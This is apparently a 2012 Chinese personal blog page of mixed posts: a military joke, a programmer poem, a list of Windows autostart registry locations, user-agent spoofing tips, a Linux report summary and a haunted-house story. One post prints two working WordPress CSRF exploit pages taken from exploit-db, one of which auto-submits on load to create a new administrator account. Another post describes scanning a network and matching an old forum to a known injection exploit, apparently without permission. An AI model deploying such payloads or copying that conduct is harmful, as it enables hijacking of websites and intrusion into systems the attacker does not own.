“团长!敌人马上就要进攻了!”一名士兵大声喊道。 “大家被子叠好了吗
提权或内网渗透中可能要用到,自己编译了一下,绿色无公害~~ linux_nc Ps:
注册表 1. HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\ All values in this k
五月 10, 2012 in 撸代码呀撸代码
“团长!敌人马上就要进攻了!”一名士兵大声喊道。
“大家被子叠好了吗?”团长没有任何表情。
“团长!敌….”
“敌NMLGB!问你被子叠好没?!”团长上前就是一巴掌。
“大家正在叠,可是光叠被子也打不赢….”士兵还没说完,只见团长怒目瞪着自己,顿时不敢做声了。
“都给我好好叠!叠不好的一律封禁10天!”团长发出号令。
同时,敌军阵营。
“长官!下令进攻吧!”
“再等等,他们怎么毫无动静?”长官答。
“长官,他们都在叠被子。”
“什么!”长官大惊失色。
长官一阵慌乱:“不好,有埋伏!大家快撤!”
我军。
“团长,敌人撤退了!”士兵简直不敢相信。
“恩。”团长回道,然后擦了擦脸上的汗。
“团长,跟着你真是安全,这么多年都没上过战场。”
“上NMLGB!”团长说着,指了指背后如豆腐块般的被子:“这个!就是我们的战场!”
团长说完,不再理会士兵仰慕的目光,径直朝厕所走去,深藏功与名。
五月 9, 2012 in 撸代码呀撸代码, 这不是无聊的蛋疼么
注册表
1.
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run\
All values in this key are executed.
2.
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunOnce\
All values in this key are executed, and then their autostart reference is deleted.
3.
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServices\
All values in this key are executed as services.
4.
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\RunServicesOnce\
All values in this key are executed as services, and then their autostart reference is deleted.
5.
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run\
All values in this key are executed.
6.
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\RunOnce\
All values in this key are executed, and then their autostart reference is deleted.
7.
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\RunOnce\Setup\
Used only by Setup. Displays a progress dialog box as the keys are run one at a time.
8.
HKEY_USERS\.Default\Software\Microsoft\Windows\Cur rentVersion\Run\
Similar to the Run key from HKEY_CURRENT_USER.
9.
HKEY_USERS\.Default\Software\Microsoft\Windows\Cur rentVersion\RunOnce\
Similar to the RunOnce key from HKEY_CURRENT_USER.
10.
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
The “Shell” value is monitored. This value is executed after you log in.
11.
HKEY_LOCAL_MACHINE\Software\Microsoft\Active Setup\Installed Components\
All subkeys are monitored, with special attention paid to the “StubPath” value in each subkey.
12.
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servic es\VxD\
All subkeys are monitored, with special attention paid to the “StaticVXD” value in each subkey.
13.
HKEY_CURRENT_USER\Control Panel\Desktop
The “SCRNSAVE.EXE” value is monitored. This value is launched when your screen saver activates.
14.
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Contro l\Session Manager
The “BootExecute” value is monitored. Files listed here are Native Applications that are executed before Windows starts.
15.
HKEY_CLASSES_ROOT\vbsfile\shell\open\command\
Executed whenever a .VBS file (Visual Basic Script) is run.
16.
HKEY_CLASSES_ROOT\vbefile\shell\open\command\
Executed whenever a .VBE file (Encoded Visual Basic Script) is run.
17.
HKEY_CLASSES_ROOT\jsfile\shell\open\command\
Executed whenever a .JS file (Javascript) is run.
18.
HKEY_CLASSES_ROOT\jsefile\shell\open\command\
Executed whenever a .JSE file (Encoded Javascript) is run.
19.
HKEY_CLASSES_ROOT\wshfile\shell\open\command\
Executed whenever a .WSH file (Windows Scripting Host) is run.
20.
HKEY_CLASSES_ROOT\wsffile\shell\open\command\
Executed whenever a .WSF file (Windows Scripting File) is run.
21.
HKEY_CLASSES_ROOT\exefile\shell\open\command\
Executed whenever a .EXE file (Executable) is run.
22.
HKEY_CLASSES_ROOT\comfile\shell\open\command\
Executed whenever a .COM file (Command) is run.
23.
HKEY_CLASSES_ROOT\batfile\shell\open\command\
Executed whenever a .BAT file (Batch Command) is run.
24.
HKEY_CLASSES_ROOT\scrfile\shell\open\command\
Executed whenever a .SCR file (Screen Saver) is run.
25.
HKEY_CLASSES_ROOT\piffile\shell\open\command\
Executed whenever a .PIF file (Portable Interchange Format) is run.
26.
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servic es\
Services marked to startup automatically are executed before user login.
27.
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servic es\Winsock2\Parameters\Protocol_Catalog\Catalog_En tries\
Layered Service Providers, executed before user login.
28.
HKEY_LOCAL_MACHINE\System\Control\WOW\cmdline
Executed when a 16-bit Windows executable is executed.
29.
HKEY_LOCAL_MACHINE\System\Control\WOW\wowcmdline
Executed when a 16-bit DOS application is executed.
30.
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
Executed when a user logs in.
31.
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\ShellServiceObjectDelayLoad\
Executed by explorer.exe as soon as it has loaded.
32.
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\run
Executed when the user logs in.
33.
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\load
Executed when the user logs in.
34.
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Policies\Explorer\run\
Subvalues are executed when Explorer initialises.
35.
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Policies\Explorer\run\
Subvalues are executed when Explorer initialises.
文件夹
1. windir\Start Menu\Programs\Startup\
2. User\Startup\
3. All Users\Startup\
4. %windir%\system\iosubsys\
5. %windir%\system\vmm32\
6. %windir%\Tasks\
文件
1. c:\explorer.exe
2. c:\autoexec.bat
3. c:\config.sys
4. %windir%\wininit.ini
5. %windir%\winstart.bat
6. %windir%\win.ini – [windows] “load”
7. %windir%\win.ini – [windows] “run”
8. %windir%\system.ini – [boot] “shell”
9. %windir%\system.ini – [boot] “scrnsave.exe”
10. %windir%\dosstart.bat
11. %windir%\system\autoexec.nt
12. %windir%\system\config.nt
五月 9, 2012 in 苦逼程序员, 这不是无聊的蛋疼么
写字楼里写字间,写字间中程序员;程序人员写程序,又将程序换酒钱;
酒醒只在屏前坐,酒醉还来屏下眠;酒醉酒醒日复日,屏前屏下年复年;
但愿老死电脑间,不愿鞠躬老板前;奔驰宝马贵者趣,公交自行程序 员;
别人笑我太疯癫,我笑自己命太贱;但见满街漂亮妹,哪个归得程序员?
五月 9, 2012 in 撸代码呀撸代码, 苦逼程序员, 这不是无聊的蛋疼么
这里给出两个exp,exploit-db上挖来的,欣赏一下。
————————-修改标题—————————
<html> |
<body onload="javascript:document.forms[0].submit()"> |
<H2>CSRF Exploit to change post title</H2> |
<form method="POST" name="form0" action="http://<wordpress_ip>:80/wp-admin/admin-ajax.php"> |
<input type="hidden" name="post_title" value="hackedtitle"/> |
<input type="hidden" name="post_name" value="hackedtitle"/> |
<input type="hidden" name="mm" value="03"/> |
<input type="hidden" name="jj" value="16"/> |
<input type="hidden" name="aa" value="2012"/> |
<input type="hidden" name="hh" value=""/> |
<input type="hidden" name="mn" value=""/> |
<input type="hidden" name="ss" value=""/> |
<input type="hidden" name="post_author" value="1"/> |
<input type="hidden" name="post_password" value=""/> |
<input type="hidden" name="post_category%5B%5D" value="0"/> |
<input type="hidden" name="post_category%5B%5D" value="1"/> |
<input type="hidden" name="tax_input%5Bpost_tag%5D" value=""/> |
<input type="hidden" name="comment_status" value="open"/> |
<input type="hidden" name="ping_status" value="open"/> |
<input type="hidden" name="_status" value="publish"/> |
<input type="hidden" name="post_format" value="0"/> |
<input type="hidden" name="_inline_edit" value="<sniffed_value>"/> |
<input type="hidden" name="post_view" value="list"/> |
<input type="hidden" name="screen" value="edit-post"/> |
<input type="hidden" name="action" value="inline-save"/> |
<input type="hidden" name="post_type" value="post"/> |
<input type="hidden" name="post_ID" value="1"/> |
<input type="hidden" name="edit_date" value="true"/> |
<input type="hidden" name="post_status" value="all"/> |
</form> |
</body> |
</html> |
<html> |
<body onload="javascript:document.forms[0].submit()"> |
<H2>CSRF Exploit to add Administrator</H2> |
<form method="POST" name="form0" action="http://<wordpress_ip>:80/wp-admin/user-new.php"> |
<input type="hidden" name="action" value="createuser"/> |
<input type="hidden" name="_wpnonce_create-user" value="<sniffed_value>"/> |
<input type="hidden" name="_wp_http_referer" value="%2Fwordpress%2Fwp-admin%2Fuser-new.php"/> |
<input type="hidden" name="user_login" value="admin2"/> |
<input type="hidden" name="email" value="admin2@admin.com"/> |
<input type="hidden" name="first_name" value="admin2@admin.com"/> |
<input type="hidden" name="last_name" value=""/> |
<input type="hidden" name="url" value=""/> |
<input type="hidden" name="pass1" value="password"/> |
<input type="hidden" name="pass2" value="password"/> |
<input type="hidden" name="role" value="administrator"/> |
<input type="hidden" name="createuser" value="Add+New+User+"/> |
</form> |
</body> |
</html> |
五月 8, 2012 in 苦逼程序员, 这不是无聊的蛋疼么
上个J8,就是那个上网检测东西。。
其实记录的很详细,没有加密的聊天内容都可以看到。我还是比较尊重他人隐私的,所以只查看了一些上网行为。
刚才说了,扫了一下那个网段的80端口,有一个开着,就点进去看了一下,是BMForum 2007 5.6的论坛,php的。
老系统了,记得前几年爆了个注入,也不知道是不是这个版本,上db-exploit看了一下,艹,中枪了。
四月 16, 2012 in 撸代码呀撸代码
注意标题啊,iPad安装win8目前还不在我的技术支持范畴之内,现在网上流传的只是在iPad上体验win8的Metro而已。
特此写个傻瓜教程,教你如何在iPad上体验win8,毕竟现在 win8 on ARM 还没有发布,win8 PC 正式版也得等到今年12月。
【转载请注明来源:D.J.S 技术部】
想在 iPad 上体验 win8 很简单,开始吧:
注意:
1,传统界面下的控制也是比较轻松的,使用起来感觉就和电脑上操一样。特别的是新加入的分屏显示模式,这让分辨率在 1336×768 以上的大屏用户拥有了更多的信息显示量,如果分辨率没有达到要求也不必着急,在桌面上按 Win+R 键,输入 regedit 并查找以下内容:
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ImmersiveShell\AppPositioner
“AlwaysEnableLSSnapping”= dword:00000001如果没有该键就创建一个。
2,还有如果想搜索只需要在 Metro 界面直接输入关键词,或者选择 Win+F;按 Alt+Tab 可以通过选择栏在已打开的程序间切换;Win+Tab 是循环切换应用程序,当然不再是以前的 Flip3D 模式了;而现在调出任务管理器是用 Ctrl+Shift+Esc。值得一提的是,Splashtop 中的 Shift、Ctrl、Win、Alt 四键可以自动按住,很好的避免了几个手指一起点的尴尬场面。
其实就这么简单。
但是我需要说明一下,这其实就是远程桌面而已,虽然支持多点 触控,但并不是给iPad上安装win8系统,千万不要误解。
下面送几张体验的图
四月 11, 2012 in 撸代码呀撸代码
在 Linux 基金会刚刚发布的 Linux 发展年度报告中显示,Linux 开发活跃度较上次调查有了很大的提升;此外,微软凭借着 726 项、约 1% 的更改量首次出现在贡献厂商榜单上,名列第 17 位。
本次报告的其他看点有:
Linux 内核开发人数明显增加:现有来自 800 多个公司的 7800 名开发者在参与内核开发工作,而上次调查中,则只有来自 200 多个公司的 1000 名开发者在参与开发。
75% 的开发者的工作是有薪酬回报的:这可能与人们的普遍认识不同,Linux 已经不再是“极其志愿”的工作;这些有薪回报的开发人员一般都来自 Android 、云计算,KVM / Xen 等等相关的企业。
从上次报告之后算起,Linux 内核开发前十名的赞助企业分别是:红帽、英特尔、Novell、IBM、德仪、Broadcom、诺基亚、三星、甲骨文、谷歌。其中,嵌入式企业的赞助在这次报告期间增加许多,其中不仅是提供硬件支持,开发人员还参与了提高内核核心代码区性能的工作。
代码更改率较上次报告提高许多:每两到三个月,就有 8000 到 12000 个 patch放出,相当于每个小时就有 6 个 patch 放出。
本次 Linux 年度发展报告的主题为“Linux 内核发展:谁在做?做什么?有多快?谁出钱”(Linux Kernel Development: How Fast It is Going, Who is Doing It, What They are Doing and Who is Sponsoring It.),旨在汇报上一个年度中 Linux 的艰难发展历程。整个报告的时间范围是从上一次 Linux 年度报告后(2010 年 12 月,kernel 2.3.36)到 Linux 3.2 发布。
四月 5, 2012 in 苦逼程序员
简单的说User-Agent就是客户端浏览器等应用程序使用的一种特殊的网络协议,在每次浏览器(邮件客户端/搜索引擎蜘蛛)进行 HTTP 请求时发送到服务器,服务器就知道了用户是使用什么浏览器(邮件客户端/搜索引擎蜘蛛)来访问的。既然是人为规定的协议,那么就
简单的说User-Agent就是客户端浏览器等应用程序使用的一种特殊的网络协议,在每次浏览器(邮件客户端/搜索引擎蜘蛛)进行 HTTP 请求时发送到服务器,服务器就知道了用户是使用什么浏览器(邮件客户端/搜索引擎蜘蛛)来访问的。既然是人为规定的协议,那么就是说不管什么浏览器,默认的UA都是可以更改的。有时候为了达到一些不可告人的目的,我就经常需要更改一下UA的设置,比如伪装一下浏览器类型,比如把浏览器伪装成手机上网。
得到HTTP_USER_AGENT 的方法很简单,比如php代码:
<?php print_r($_SERVER);
?>
<?php print_r($_SERVER['HTTP_USER_AGENT']);
?>
这两种都可以得到User-Agents和IP等信息,最好配合正则表达式,对信息进行筛选剔除。
————– User-Agents列表————-
Internet Explorer 6
Internet Explorer 7
Internet Explorer 8
Firefox
Chrome
Safari
Netscape
Opera
Maxthon
360SE
OmniWeb
有了这个文件中的信息,什么样的浏览器和操作系统都能伪装出来。
使用User-Agents的方法:
FireFox:[推荐使用User-Agent switcher 这个火狐扩展]
地址栏键入:about:config 回车
设置:general.useragent.override–>自定义的 UA 信息 。
Chrome
启动EXE图标属性中加上启动参数:–user-agent=”UA信息” 即可。
Safari
菜单栏->Edit->Preferences->Advanced->Show Develop menu in menu bar;
菜单栏->Develop->User-Agent->UA信息。
Maxthon
工具栏->工具->遨游设置中心->高级选项->自定义UA信息。
Opera
地址栏键入:opera:config 回车
设置:User-Agent->自定义ID 0—5
注: [0 Default 1 Opera 2 Mozilla, Opera detectable 3 Internet Explorer, Opera detectable 4 Mozilla, Opera hidden 5 Internet Explorer, Opera hidden ]
iPhone
替换 /System/Library/Frameworks/WebKit.framework/WebKit 这个文件的 Mozilla/5.0字符串 为自定义UA信息
IE浏览器的设置需要修改注册表
User-Agent在注册表的位置
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User-Agent\Post Platform] 下,新建字符串值,内容留空,名字为你想在 User-Agent 中加入的字符,这里以 “motorolarokre2″为例。修改注册表对应的 REG 文件如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\User-Agent\Post Platform]
“motorolarokre2″=””
修改后重启IE浏览器即可。
IE的user-agent取值,下面是下列地址的组合+一些默认值
HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User-Agent\Post Platform
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User-Agent\Post Platform
HKLM\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\User-Agent\Post Platform
IE8的User-Agents:
IE8 on Windows Vista (兼容浏览)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Trident/4.0)
IE8 on Windows Vista
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)
IE8 on Windows 7
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
64-bit IE on 64-bit Windows 7:
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0)
32-bit IE on 64-bit Windows 7:
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0)
通过修改User-Agent,你还可以完美的伪装:操作系统、浏览器、蜘蛛、邮件客户端、链接检查、分析器、RSS 阅读器等客户端的信息。
四月 5, 2012 in 这不是无聊的蛋疼么
想必大家也清楚,所谓的凶宅就是曾经里面有人横死过的房子。
而自然死亡的一般是不算的。
横死也是一个比较民间的说法,一般就是指非自然死亡。譬如意外,自杀,他杀等等等。
这种死亡的人传说中因为阳寿并没有过完,所以死的会很不甘心。通常会阴魂不散,所以多数的凶宅一般都是有一些怪事发生的。即便不发生怪事,也会根据人们口口相传变得光怪陆离起来。
房子的主人一般也都很可怜,因为很多都是他们向外出粗的,所以房客横死在里面。不仅完全影响到了后续无人愿意再租住的事情,即便是想要卖掉转手也很少有人很接,所幸碰见个不明就里的人卖给他,现今的法律规定在不知情的情况下买卖凶宅,购买者是可以无条件要求退款的。
而且,就算是卖给一个不信邪的人,恐怕价格也是大大大打了折扣。以楼主小时候住的房子为例(楼主原来的家对门有一女性为情所困开煤气自杀了),一套大概能值到30万的小商品房,因为租住的访客横死在里面,最后只能以6万块的价格成交。
楼主近几年做的就是这样一个买卖,专程打探何处有此样的凶宅,然后 以超低价格买进。老一些的宅子楼主基本是放在那里等着拆迁后的新房,这就算大赚一笔。而新一些的房子,通常楼主也是放在银行抵押贷款,做一些其它的生意。
这样循环起来,也算是一个生计。
因为经常接触凶宅,虽说也尝尝会被凶宅相关的故事和背景吓到。却也没有危及生命的大灾祸出现。不过却也是尝尝偶遇怪事。所以楼主今天就来讲讲我这几年和凶宅打交道的遭遇。
近期评论